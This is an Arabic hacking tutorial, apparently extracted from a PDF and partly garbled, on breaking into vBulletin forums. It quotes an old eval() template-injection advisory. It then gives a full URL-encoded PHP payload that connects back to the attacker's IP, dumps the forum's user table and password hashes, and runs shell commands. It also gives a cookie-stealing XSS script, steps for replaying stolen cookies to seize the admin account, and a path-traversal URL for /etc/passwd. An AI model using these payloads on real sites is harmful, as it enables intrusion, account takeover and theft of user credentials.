‫ﺘﻚﻓﺴ‬ ‫اﻟﻤﻤﻨﻮ ﺣﺔﻟﻚﻓﺈنﻟﻢ ﯾﻌﺜ ﺮ ﻋﻠﻰ ‪ SID‬ﻣﻄﺎﺑ ﻖﻟﺨﺎ ﺻ‬

‫ﻣﻠﺨ ﺺاﻟﺪرس‪:‬‬

‫ﺘﻲ ﯾﺠﺐاﺗﺨﺎذﻫﺎﻟﻠﻤ ﺤﺎﻓﻈﺔ ﻋﻠﻰأﻣﻦاﻟﺸﺒﻜﺔ و ﻣﻨﻬﺎ‪:‬‬ ‫ﻫﻨﺎكﺑﻌ ﺾاﻹﺟ ﺮا ءا تاﻟ‬


‫ﻗﺒﺔاﻟﻌﻤﻠﯿﺎ ت‬
‫ﻗ ﺮا ص ‪ ،‬ﻣ ﺮا‬
‫ﺘﺨﺪامأﺟﻬﺰة ﻋﺪﯾﻤﺔ ﺎﻷ‬ ‫ﺘﺨﺪﻣﯿﻦ ‪ ،‬ﺣﻤﺎﯾﺔاﻟﻤﻌﺪا ت ‪،‬ﺗﺸﻔﯿ ﺮاﻟﺒﯿﺎﻧﺎ ت ‪،‬اﺳ‬ ‫ﺗﺪرﯾﺐاﻟﻤﺴ‬
‫ﺘﻲﺗﺠ ﺮى ﻋﻠﻰاﻟﺸﺒﻜﺔ‪.‬‬ ‫اﻟ‬

‫ﺘﺼﺎرﯾﺢ واﻟ ﺤﻘﻮ ق ‪:‬‬


‫ﻫﻨﺎك ﻧﻈﺎﻣﺎنأﺳﺎﺳﯿﺎن ﻹﻋﻄﺎ ءاﻟ‬

‫‪ -١‬ﺎﻟﻤﺸﺎرﻛﺔاﻟﻤ ﺤﻤﯿﺔﺑﻜﻠﻤﺔ ﻣ ﺮور‪.‬‬

‫‪-٢‬ﺗﺼﺎرﯾﺢاﻟﻮ ﺻﻮ ل‪...‬‬

‫‪٦٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"درس ﻣﻔﺼﻞ ﻋﻦ ﻛﯿﻔﯿﺔ اﺧﱰاق اﳌﻨﺘﺪﯾﺎت وﻃﺮق ﲪﺎﯾﺘﻬﺎ"‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻌﻘ ﺮباﻷ ﺣﻤ ﺮ‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﺘﻜﻮن ﻣﻦ ‪ ٧‬ﻧﻘﺎط‬ ‫ﺎﻟﺪرس ﯾ‬


‫ﺘﺪﯾﺎ ت واﻧﻮاﻋﻪ‬ ‫‪-١‬اﻟﻤﻨ‬
‫ﻗﻪ‬‫ﺘ ﺮا‬
‫‪ -٢‬ﻃ ﺮﯾﻘﺔا ﺧ‬
‫ـ‪SQL‬‬ ‫ـ‬‫ـ‬‫ـ‬
‫ﺘ ﺮا ق ﺎﻟ‬
‫‪-٣‬أ ﺧ‬
‫ﺘﺪﯾﺎ ت‬
‫ﺘ ﺮا قاﻟﻤﻨ‬‫‪ -٤‬ﺳ ﺮﻓ ﺮا تاﻟﻮﯾﻨﺪوز ودورهﻓﻲا ﺧ‬
‫ﺘﺸ ﺮهﻓﻲ ﺎﻟﻨ ﺖ ودوراﻟﻤﻌ ﺮﺑﯿﻦاﻟﻌ ﺮب و ﺣﻘﯿﻘﺔاﻟﻤﻮ ﺿﻮ ع وﺗﻌ ﺮﯾﺒﻬﻢ‬ ‫‪-٥‬اﻟﻨﺴﺨﻪاﻟﻤﻨ‬
‫ﺘﺪﯾﺎﺗﻜﻢ‬
‫ﻗﯿﻦﺑﻨﺴﺒﺔ ‪ 80%‬ﻻاﺟﻬﺰﺗﻜﻢ وﻣﻨ‬ ‫ﺘﺮ‬‫‪-٦‬اﻟ ﺤﻤﺎﯾﻪ ﻣﻦاﻟﻤﺨ‬
‫ﺘ ﺮا ق‬
‫‪ -٧‬ﺎﻟﻤﺠﻠﻪﺑﺠﻤﯿﻊ ﻧﺴﺨﻪﻗﺎﺑ ﻞ ﻻاﻟﺨ‬

‫ﺎﻟﺪروس ﺟﻤﯿﻌﻬﺎﺑﺎﻟﺼﻮرة و ﺣﻘﺎﺋ ﻖ ودﻻﺋ ﻞ‬

‫ﺘﺔ ﻋﻠﯿﻪ وﺗﻌﺪﯾﻠﻪ‪100%‬‬


‫ﺘﺠﻤﯿﻊاﻟﺪروس واﻻ ﺿﺎﻓ‬
‫ﻗﻤ ﺖﺑ‬

‫ﺎرﺟﻮ ﻋﺪم ﻧﻘ ﻞاﻟﺪروس وﻛﻮﺑﻲ‬

‫*************************************************************************‬

‫ﺘﺪﯾﺎ ت ﻮاﻧﻮاﻋﻪ‬
‫‪ -١‬ﺎﻟﻤﻨ‬
‫^^^^^^^^^^^^^‬

‫ﺘﺪﯾﺎ ت ﺟﻮن ‪Powered by: vBulletin‬ﺑﺠﻤﯿﻊ ﺎ ﺻﺪاراﺗﻪ‬


‫ﺘﺪﯾﺎ تاوﻻ ﻣﻨ‬
‫ﺎﻟﻤﻨ‬

‫ﺘﻲاﻻن‬ ‫ﺘﺪاﻫﻢ ﺣ‬‫ﺘ ﺮ قا ﺣﺪي ﻣﻨ‬


‫‪١‬ﻟﻤﺎذاﻟﻢ ﯾﺨ‬
‫‪٢‬اﻻﯾﻮﺟﺪﻟﻬﻢ ﻣﻠﯿﻮن ﻋﺪو‬
‫ﺘﻪﺗﺼ ﻞاﻟﻲ ‪60%‬ﻓﻲاﻟﺴ ﺮﻓ ﺮ‬
‫ﺘﺪي ﺟﻮن و ﺣﻤﺎﯾ‬
‫ﺘﺪﯾﺎ ت ﯾﻮﻣﯿﺎ وﻟﻤﺎذاﻟﯿ ﺲ ﻣﻨ‬
‫ﻗﻮن ﻋﺸ ﺮا تاﻟﻤﻨ‬‫ﺘﺮ‬‫‪٣‬اﻻﯾﺨ‬

‫ﺘﻄﻮﯾ ﻞاﻻنﺑ ﺲ ﻣﺜﺎ لﻟﻤﻦ ﯾﻔﻬﻤﻪ‬


‫ﻗﻌﻬﻢاﺷﻮي ﺷﻐ ﻞﻛﻤﺎنﺗﺼ ﻞﻟﻘﻠﺒﻬﻢ ﻻارﯾﺪ ﺎﻟ‬
‫ﺗﻔ ﻀ ﻞﻫﺬاﺛﻐ ﺮا تﺑﻤﻮ‬
‫=‪http://www .vbulletin.org/index.php?topic‬‬
‫>‪<script>alert(document.cookie)</script‬‬

‫‪2‬‬
‫?‪http://www.vbulletin.org/index.php‬‬
‫‪|=forum/view.php&topic=../../../../../../../etc/passwd‬‬

‫‪٦٤‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

********************************************************** ********************

‫ﻗﻪ‬ ‫ﺘ ﺮا‬
‫ ﻃ ﺮﯾﻘﺔ ﺎ ﺧ‬-٢
^^^^^^^^^
‫ﺟﻤﯿﻊاﻻﺻﺪارا ت‬
‫ﺘﺬﻛ ﺮو ﯾﻤﻜﻦﺑﻌ ﻀﻜﻢ‬ ‫ﺑ‬١١٣ ‫ﻓﻠﻨﺒﺪي ﻣﻦ ﺻﻔ ﺮ ﻧﺴﺨﺔ‬
‫ وﻫﺬا‬، ‫ﺘﺪﯾﺎ ت ﯾ ﺤﺐ ﯾ ﺮﻛﺒﻪﻗﻠﯿﻠﯿﻦاﻟﺨﺒ ﺮهﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن‬
‫ وﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟﻤﻨ‬، ‫ﺘﺪﯾﺎ تاﻟﻔﻲﺑﻲ‬ ‫ﻛﻠﻨﺎ ﻧﻌ ﺮ ف ﻣﻨ‬
‫ﺘﺪى ﻫﻮاﻟﻤﻌ ﺮو ف ﻋﻨﺪﻧﺎاﻟﻌ ﺮبﺑﻜﺜ ﺮه‬ ‫اﻟﻤﻨ‬
) Jouko Pynnonen ‫ﺘﻘﺪ‬ ‫ﺘﺒﻪاﻟﻔ ﺮﻧﺴﻲ )ﻋﻠﻰ ﻣﺎأﻋ‬ ‫ﺎﻷو لاﻟﻠﻲﻛ‬

) is a commonly used web forum http://www .vbulletin.com/vBulletin (


system written in PHP. One of its key features is use of templates,
which allow the board administrator to dynamically modify the look of
the board.
vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval()
parameters
and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the
web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.

According to the authors the vulnerability exist in all versions of


vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependant issues, so it's presumably
exploitable under any OS or platform.

DETAILS
=======

vBulletin templates are implemented in the following way: the


gettemplate() function in global.php is used to fetch a template from

٦٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

database. The code is then passed to eval(). If we take index.php for


an example, there's this code:

if ($action=="faq") {
eval("echo dovars(\"".gettemplate("faq")."\");");
}

The dovars() function does some variable replacing, such as replace


<largefont> with <font size="10">.

The gettemplate() function is defined in global.php:

function gettemplate($templatename,$escape=1) {
// gets a template from the db or from the local cache
global $templatecache,$DB_site;

if ($templatecache[$templatename]!="") {
$template=$templatecache[$templatename];
} else {
$gettemp=$DB_site->query_first("SELECT template FROM template
WHERE title='". addslashes($templatename)."'");
$template=$gettemp[template];
$templatecache[$templatename]=$template;
}

if ($escape==1) {
$template=str_replace("\"","\\\"",$template);
}
return $template;
}

For effectiveness the function implements a simple cache for template


strings. After fetching them from the database they're stored in the
templatecache[] array. This array is checked for the template before
doing the SQL query. Unfortunately the array is never initialized, so
a user can pass array contents in the URL, e.g.
(for simplicity not %-escaped)

٦٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

http://www.site.url/index.php?action=faq&templatecache
[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page
with the words "hello world".

The eval() call above will execute

echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a


value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case
index.php could end up executing code like

echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It


doesn't take a rocket scientist to figure out how a remote user could
execute arbitrary code from here, so further details about exploitation
aren't necessary. If your vBulletin board produces an error message
with an URL like the one above prefixed with a single quotation mark,
it's definitely vulnerable.
The above example works with the "Lite" version. The commercial
versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
have an eval() problem with URL redirecting, e.g.

"world http://www.site.url/member.php?acti...ypass&url=hello

and a similar one in the Lite version:


http://www.site.url/search.php?acti...s&templatecache
[standardredirect]=hello"world
، ‫ﺗﻨﻔﺬﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ‬url ‫ ﻣﻦاﻟﻜﻼمﻫﺬاأﻧ ﺖ ﻣﻤﻜﻦﺗ ﺮﺳ ﻞأﻛﻮاد ﺧﻠ ﻒ‬، ‫ﺘ ﺮﺟﻤﻪ‬ ‫ﺗﻌ ﺮﻓﻮناﻟﻜﻼمﻫﺬا وﻻ داﻋﻲﻟ‬
: ‫ ﺟ ﺮب ﻣﺜﻼ‬، ‫ ﺎﻟﻐﺒﯿﻪ‬hello+world ‫ﺗ ﻀﻌﻬﺎﺑﺪ لاﻟﻜﻠﻤﻪ‬

vb 113 or 115 ‫ رﻛﺐﻓﻲ ﺟﻬﺎزك ﻣﻠﻘﻢ وﯾﺐأي ﻣﻠﻘﻢﺗ ﺤﺒﻪ ﻣﻤﻜﻦﺗ ﺮﻛﺐ ﻋﻠﯿﻪ‬-١
(‫ﺘﺢاﻟﺒﻮر تﺗﻜﻮن ﻋﻠﻰ ﻣﺠﺎزك‬
‫ ﻋﻨﺪكﻓﻲ ﺟﻬﺎزك ) ﻃ ﺮﯾﻘﻪﻓ‬٩٠ ‫ﺘﺢاﻟﺒﻮر ت‬ ‫ﺄﻓ‬-٢
‫ﻫﺬااﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ‬url ‫ـ‬
‫أرﺳ ﻞاﻟ‬-٣

٦٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

search.php3?action=simplesearch&query=searchthis&templatecache[s
tandardredirect]="%29%3B%24fa="<%261";set_time_limit(substr("900"
,0,3));%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),%26%
24errno,%26%24errstr,substr("900"
,0,3));if(!%24fp){}else{%24arr[200];fputs(%24fp,su

bstr("vhak1.0,%20-
d%20downloads%20database,or%20press%20return%20for

%20command%20line"
,0,63));%24va=fgets(%24fp,3);fputs(%24fp,%24va);if

(strlen(%24va)>1){include(substr("admin/config.php",0,16));include(sub
str("admin/config.php3",0,17));mysql_connect(substr("%24servername
",0,strlen(%24servername)),substr("%24dbusername",0,strlen(%24dbus
ername)),substr("%24dbpassword"
,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu

ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*%20
from%20user" ,0,18));while(%24res=mysql_fetch_array%20(%24curre

nta)){fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid
],");fputs(%24fp,"%24res[password],");fputs(%24fp,"%24res
%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),%24arr);for(%24ir=
substr("0",0,1);%24ir<
sizeof(%24arr);%24ir%2B%2B){fputs(%24fp,%24arr[%24

ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak_

finished_execution);echo%28"
By Kill -9

‫ وﻫﺬاﺗﻐﯿ ﺮﻫﺎ ﻋﻠﻰ‬١٢‫ﻗﻢ‬


‫ﺛﻢ ﺎﻻ ﺣﻆﺑﻌﺪﻫﺎ وﺟﻮداﻟ ﺮ‬، ‫ﻗﻢاﻵيﺑﻲ ﺣﻘﻚ‬ ‫ﻫﺬهﺗ ﺤﻂ ﻣﻜﺎﻧﻬﺎ ر‬IP.IP.IP.IP ‫ﻻ ﺣﻆ‬
٩ ‫ ﯾﻜﻮن ﻃﻮﻟﻪ‬١٢٧٫٠٫٠٫١ ‫ ﻣﺜﻼ‬، ‫ﻗﻢاﻵيﺑﻲ‬ ‫ﻃﻮ ل ر‬

‫ﻫﺬا ﻣﺜ ﻞ ﻣﺎ ﺻﺎر‬، ‫ ﻣﻤﻜﻦﺗ ﺮﺳ ﻞﻛﻮد ﯾﺴﺠ ﻞﻟﻚأدﻣﯿﻦ‬، ‫ﺘﻨﻔﺬ‬ ‫ﺘ ﺮ عﻛﻮدﺛﺎﻧﻲ وﺗ ﺮﺳﻠﻪ وﺗﻼ ﺣﻆأﻧﻪ ﯾ‬ ‫ﻣﻤﻜﻦأﻧ ﺖﺗﺨ‬
‫ ﻮ‬c4arab.com ‫ ﻮﻛﻤﺎن ﺻﺎرﻓﻲ‬، ‫ﺘﻨﺒﯿﻪ‬ ‫ﻗﺎﺋﻲ ﻃﺒﻌﺎ( ﻣﻦﺑﺎباﻟ‬ ‫ﺄ ﺻﺪ‬arabteam2000.com (‫ﻓﻲ‬
‫ ووا ﺿﺢأﻧﻪ ﻋﻤ ﻞﺑﺴﯿﻂ‬، ‫ﺘﺨ ﺮﯾﺐ‬ ‫ﺘ ﺤﺬﯾ ﺮ وﻟﯿ ﺲاﻟ‬
‫ﺑﻬﺪ ف ﺎﻟ‬، ‫ﺘﺪﯾﺎ ت‬
‫وﻛﺜﯿ ﺮ ﻣﻦاﻟﻤﻨ‬... ‫ﻃ ﺮﯾ ﻖاﻹﺳﻼم واﻟﺜﻘﺎﻓﻪ‬
‫ وﻟﻜﻦ ﻣﺴ ﺤ ﺖاﻟﺪاﺗﺎﻟﺒﯿ ﺲ وﻫﺬا ﺳﻬ ﻞﻟﻠﻐﺎﯾﻪ‬، ‫ﺘﻘﺪأﻫﻠﯿﺰﺰﻣﺎن ﺻﺎرﻓﯿﻪ‬ ‫أﻋ‬، ‫ﺘﻔﻜﯿ ﺮ‬ ‫ﺘﺎجﻟﺸﻮﯾﻪ ﻣﻦاﻟ‬ ‫ﯾﺤ‬

!! ‫ﺘﻬﺎﻟﻠﻲ ﺣﺐ ﯾﺠ ﺮبﻓﻘﻂ‬
‫ ﻮ ﺣﻄﯿ‬، ‫ﻃ ﺮﯾﻘﻪﻗﺪﯾﻤﻪ ﻧﻮﻋﺎ ﻣﺎ‬

٦٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻮأﻋﺬروﻧﻲ ﻋﻠﻰاﻹﻣﻼ ء واﻟﻨ ﺤﻮ‬

‫ﻣﻼ ﺣﻈﻪﺄ ﺧﯿ ﺮه ‪ :‬وﻫﻲ ﻋﻨﺪ ﻣﺎﺗﺸﺒﻚ ﻣﻊاﻟﺴﯿ ﺮﻓ ﺮ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﺒﻮر ت ‪٩٠‬أرﺳ ﻞ‬


‫‪-d downloads‬‬
‫ﺘﺨﻠ ﻒ ‪ ،‬وﻟﻜﻦﻓﻲ ﺎﻹ ﺻﺪاره‪x ٢٫٢‬‬
‫ﺗﻨﺰ لﻟﻚاﻟﺪاﺗﺒﯿ ﺲﻛﻠﻬﺎ ‪ ،‬وﻟﻸﺳ ﻒ ﻃﻠﻌ ﺖ ﻏﯿ ﺮ ﻣﺸﻔ ﺮه وﻫﺬا ﯾﺪ ل ﻋﻠﻰاﻟ‬
‫ﻗﻮ لﻟﻚ ﻋﻨﻬﺎ‬‫ﻗ ﺮﯾﺒﺎأ‬
‫ﺷﻔ ﺮ ت وﻟﻜﻦﻛﺴﺮﺗﻬﺎ و‬
‫ﺘ ﺮا ق ﻣﻦ ‪١١٣‬اﻟﻲ ‪١١‬‬ ‫ﺗﻢ ﺷ ﺮ ح ﻃ ﺮﯾﻘﺔ ﺎﻻ ﺧ‬

‫ﺘ ﺮا ق ﻣﻦ ‪١١٥‬اﻟﻲ ‪٢٢٥‬‬
‫ﻃ ﺮﯾﻘﺔا ﺧ‬

‫ﺘ ﺮﻧ ﺖ( ﺎﻛﺴﺒﻠﻮرر( ‪.‬‬
‫ﺘﺼﻔﺢاﻧ‬
‫ﺘﻄﻠﺒﺎ ت( ‪: WebServer‬ﺗ ﺮﻛﯿﺐ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﻰ ﺟﻬﺎزكاﻟﺸﺨﺼﻲ( ‪ +‬ﻣ‬
‫ﺎﻟﻤ‬
‫ﺘﻮﺳﻂ‬‫ﺘﻮى ‪ :‬ﻣ‬ ‫ﺎﻟﻤﺴ‬

‫ﺘﺪﯾﺎ ت ‪.‬‬
‫ـ ‪vBulletin‬ﻓﻘﻂ !! ﯾﻤﻜﻦانﺗﺠ ﺮﺑﻬﺎ ﻋﻠﻰاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻨ‬
‫ﻣﻼ ﺣﻈﺔ ‪:‬ﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻟﺴ ﺖﻟﻠ‬

‫‪----------‬‬
‫ﺎﻟﺜﻐ ﺮة ‪:‬‬
‫‪---------‬‬

‫ﺘﻲﺗﺴ ﺮ قاﻟﻜﻮﻛﯿﺰﺑﺎﻻ ﺿﺎﻓﺔاﻟﻰ ﺟﻌ ﻞ‬


‫ﺘﺎ تاﻟﺨﺒﯿﺜﺔاﻟ‬
‫ﻗﺴﺎم ‪..‬أوﻻﺑﻌ ﺾ ﺎﻟﺴﻜ ﺮﺑ‬
‫ﺗﻨﻘﺴﻢ ﻃ ﺮﯾﻘﺔاﻟﻌﻤ ﻞاﻟﻰ ﻋﺪةا‬
‫ﺘﻘﺒ ﻞ‬
‫ﺘﺪى ﯾﺴ‬ ‫اﻟﻤﻨ‬
‫ـ ‪HTML ..‬‬‫ﺘﺪىﺑﺄﻛﻮاداﻟ‬ ‫ﺘ ﺮطان ﯾﺴﻤﺢاﻟﻤﻨ‬
‫ﺑﯿﺎﻧﺎ ت ﻣﻦ ﻣﻜﺎن ﺧﺎ ﻃﻲ ء ‪..‬ﻟﻜﻦ ﯾﺸ‬

‫ﺘﺐاي ﻣﻮ ﺿﻮ ع واﻟﺼ ﻖﺑﯿﻦاﻟﺴﻄﻮر‬


‫ـ ‪HTML ) ..‬ﺛﻢاﻛ‬
‫ﺘﺪى ﯾﺪﻋﻢاﻟ‬
‫ﺘﺎﺑﺔ ﻣﻮ ﺿﻮ ع ﺟﺪﯾﺪاو رد )ﻓﻲ ﻣﻨ‬‫ﻗﻢﺑﻜ‬
‫ﻫﺬااﻟﻜﻮد ‪:‬‬
‫‪<script>document.write('<img‬‬
‫>‪src="http://my_ip_address/'+document.cookie+'">';</script‬‬

‫ـ ‪ IP‬ﺎﻟﺨﺎ صﺑﻚ ‪.‬‬


‫ﻗﻢاﻟ‬
‫ـ ‪ IP Adress‬ﺎﻟﻰ ر‬
‫ﻣﻊ ﻣﻼ ﺣﻈﺔﺗﻐﯿ ﺮاﻟ‬

‫ﺘﻨﻔﯿﺬاﻻواﻣ ﺮﻓﻲ‬‫ﺘﻮىاﻟﺼﻔ ﺤﺔﻓﺎناﻟﺴﻜ ﺮﺑ ﺖاﻟﺬيﻗﻤﻨﺎﺑﻮ ﺿﻌﻪ ﺳﯿﻘﻮمﺑ‬ ‫ﻮﻋﻨﺪﻣﺎ ﯾﻘﻮم ﺷﺨ ﺺ ﻣﺎﺑﻘ ﺮا ءة ﻣ ﺤ‬


‫ﺘﺪى ‪..‬ﺛﻢ ﯾﻘﻮم‬
‫ﺘﻮي ﻋﻠﻰاﻟﺒﺎﺳﻮرداﻟﺨﺎ ﺻﺔﺑﺎﻟﻤﻨ‬ ‫ﺘﻲﺗ ﺤ‬ ‫ﻗ ﺮا ءة ﺟﺰ ء ﻣﻦا ﺣﺪ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟ‬
‫ﺟﻬﺎزه و‬
‫ﺘﻪ ﺳﺎﺑﻘﺎ )ﻣﻊ ﻣﻼ ﺣﻈﺔاﻧﻪ ﯾﺠﺐان ﯾﻜﻮن ﻋﻠﻰ‬‫ﺘﺎﺑ‬
‫ﻗﻢ ﺎﻻيﺑﻲاﻟﺬيﻗﻤﻨﺎﺑﻜ‬ ‫ﺘ ﺤﻮﯾ ﻞﻫﺬهاﻟﺴﻄﻮراﻟﻰ ر‬ ‫اﻟﺴﻜ ﺮﺑ ﺖﺑ‬
‫ﺟﻬﺎزي ﺳﯿ ﺮﻓ ﺮ ﻣﺜ ﻞ ‪ IIS‬ﺎو ‪ Apache‬ﺎو ﻏﯿ ﺮﻫﺎ ( ‪.‬‬

‫ﺘﻮﯾﻪ ﺟﻬﺎزك ‪..‬‬


‫ـ ‪ Log‬ﺎﻟﺨﺎ صﺑﺎﻟﺴﯿ ﺮﻓ ﺮ ﺎﻟﺬي ﯾ ﺤ‬ ‫ﺘﺢ ﻣﻠ ﻒاﻟ‬‫ﺘﻢاﻟﻌﻤﻠﯿﺔﺑﻨﺠﺎ حﻗﻢﺑﻔ‬ ‫ﻮﺑﻌﺪانﺗ‬
‫ﺘ ﺮ ‪Acces Log .‬‬ ‫ﺘ ﺮ ‪ logs‬ﻮا ﺧ‬ ‫ﺘﺎ حاﻟﻤﺠﻠﺪ ‪ Apche‬ﻮا ﺧ‬ ‫ﻣﺜﺎ لﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮاﺑﺎﺗﺸﻲ ‪..‬ﻓ‬
‫ﺘﻬﺎ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮ ‪..‬إﻟ ﺦ‬‫ﺘﻲ ﻃﻠﺒ‬
‫ﺘﺠﺪ ﺟﻤﯿﻊاﻻواﻣ ﺮاﻟ‬ ‫ﺳ‬

‫ﺎﺑ ﺤﺚ ﻋﻦاﻟﻜﻮداﻟﺨﺎ صﺑﺎﻟﺒﺎﺳﻮرد ‪ ..‬ﻣﺜﺎ ل ‪:‬‬

‫‪GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb‬‬

‫‪٦٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪ddf90622;%20sessionhash=a‬‬
‫‪4719cd620534914930b86839c4bb5f8;%20bbthreadview[54‬‬

‫‪20]=1012444064;%20bblastvi‬‬
‫‪sit=1011983161‬‬

‫ﻓﻜ ﺮﻗﻠﯿﻼاﻻن ‪..‬اﯾﻦاﻟﺒﺎﺳﻮرد ؟؟‬


‫ﺎﻟﺒﺎﺳﻮرد ﻣﻮﺟﻮدةﻟﻜﻦﺑﻄ ﺮﯾﻘﺔ ﻣﺸﻔ ﺮة ﯾﺼﻌﺐﻛﺴ ﺮﻫﺎ ‪..‬اذن ﻣﺎﻟ ﺤ ﻞ ؟‬
‫ﺘﺼﻔﺢ ‪..‬ﺑﻬﺬااﻟﺸﻜ ﻞ‬ ‫ﻗﻢﺑﻨﺴ ﺦاﻟﻜﻮداﻟﺬي وﺟﺪﺗﻪ واﻟﺼﻘﻪﻓﻲاﻟﻤ‬
‫=‪http://www.victim.com/vb/index.php?bbuserid‬‬
‫]‪[userid]&bbpassword=[password hash‬‬
‫ﻗ ﺖ ﻣﻨﻪاﻟﻜﻮﻛﯿﺰ‪" (....‬‬ ‫ـﺎ )اﺳﻢاﻟﺬي ﺳ ﺮ‬‫ﺘﺠﺪ ﻋﺒﺎرة ‪" :‬أﻫﻼﺑﻌﻮدﺗﻚ ﯾ‬ ‫ﺳ‬
‫ﻗ ﺖ ﻣﻨﻪاﻟﻜﻮﻛﯿﺰ( ‪..‬‬‫ﺘﺪى )اﻟﺬي ﺳ ﺮ‬ ‫ﺘ ﺤﻜﻢﺑﻜ ﻞ ﺷﻲ وﻛﺎﻧﻚ ﻣﺪﯾ ﺮاﻟﻤﻨ‬ ‫ﺘﻄﯿﻊاﻟ‬ ‫ﻓﻲ ﻫﺬهاﻟ ﺤﺎﻟﺔاﻧ ﺖاﻻنﺗﺴ‬
‫ﺘ ﺮوﻧﻲ‬
‫ﺘﻌﺪﯾ ﻞاﻟﺒ ﺮﯾﺪاﻻﻟﻜ‬
‫ﻗﻢﺑ‬ ‫ﺘ ﺤﻜﻢ( و‬‫ﺘ ﺤﻜﻢ ‪..‬اذﻫﺐ ﺎﻟﻰ )اﻟ‬ ‫ﺘﺎجاﻟﻰﻛﻠﻤﺔاﻟﻤ ﺮورﻟﻠﺪ ﺧﻮ لاﻟﻰﻟﻮ ﺣﺔاﻟ‬ ‫ﻟﻜﻨﻨﺎ ﻧ ﺤ‬
‫ﺘﺴﺠﯿ ﻞ ﺎﻟﺨ ﺮوج ‪..‬ﺛﻢاذﻫﺐاﻟﻰاداة ‪ Forgot Password ..‬ﻮﻋﻨﺪﻫﺎ‬ ‫ﺛﻢﻗﻢﺑ‬ ‫اﻟﻰﺑ ﺮﯾﺪكاﻟﺨﺎ ص ﻮ‬
‫ﺘﻮيﺑﺎﺳﻮرداﻻدﻣﻦ ‪..‬‬ ‫ﺘﻘﺒﺎ لﺑ ﺮﯾﺪ ﯾ ﺤ‬
‫ﺘﻄﯿﻊاﺳ‬ ‫ﺗﺴ‬

‫******************* ***************************************************************‬
‫ـ ‪SQL‬‬ ‫ـ‬‫ـ‬‫ـ‬
‫ﺘ ﺮا قاﻟ‬
‫‪-٣‬ﺄ ﺧ‬
‫^^^^^^^^^^^^^‬
‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞاﻟﻌﻘ ﺮبﺑﯿﻜﻮناﺳ ﺮ عﻟﻤﻦﻟﺪﯾﻪ ﻧﺴ ﺦ ﻣﻨﻪ‬ ‫ﯾﻤﻜﻨﻚاﺳ‬
‫ﺲ ‪:‬ﻓﻲاﻟﺒﺪاﯾﺔ ﻣﺎﻫﻲاﻻسﻛﯿﻮا ل) ‪ ( SQL‬؟؟‬
‫ﺘﻬﯿﺔ ب‬ ‫ﺘﻲﺗﻜﻮن ﺻﻔ ﺤﺎﺗﻬﺎ ﻣﻨ‬ ‫ﻗﻊاﻟ‬ ‫ﺘﻮي ﻋﻠﻰ ﺟﺪاو ل واﻏﻠﺐ ﺎﻟﻤﻮا‬ ‫ﺎﻻسﻛﯿﻮا لﻫﻲ ﻋﺒﺎرة ﻋﻦﻗﺎﻋﺪﺑﯿﺎﻧﺎ تﺗ ﺤ‬
‫‪ASP‬ﻫﻲ ﺻﻔ ﺤﺎ تﺗﺴ ﺤﺐﺑﯿﺎﻧﺎﺗﻬﺎ ﻣﻦﻗﺎﻋﺪة ‪ SQL‬ﻮ ﺻﻔ ﺤﺎ ت ‪ ASP‬ﻣﻤﻜﻦانﺗﻜﻮنﻛﻨﺰ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت‬
‫ﺘﻨﺼ ﺖ ﻋﻠﻰاﻟﺒﻮر ت ‪١٤٣٣‬‬ ‫ﺘ ﺮا قﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ SQL‬ﻮﻫﺬا ﻣﺎﺳﻮ ف ﺎﺷﯿ ﺮاﻟﯿﻪ ﻻ ﺣﻘﺎ ‪ ،‬و ‪ SQL‬ﺗ‬ ‫ﻻﺧ‬
